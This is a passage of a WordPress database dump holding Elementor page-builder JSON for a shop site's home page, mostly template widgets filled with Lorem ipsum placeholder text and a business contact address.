Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8726,1514,'_elementor_page_assets','a:0:{}'),(8770,1516,'_elementor_edit_mode','builder'),(8771,1516,'_elementor_template_type','wp-page'),(8772,1516,'_elementor_version','3.7.8'),(8773,1516,'_wp_page_template','elementor_canvas'),(8774,1516,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"459f42f\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":733,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"ff18146\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d32e3fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"cca4b63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ae5ba57\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"0b52a20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0f21eac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_custom_dimension\":{\"width\":\"3400\",\"height\":\"1300\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"fe9d098\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1279df7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"61ee343\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1189e91\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#E2E4E28C\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus 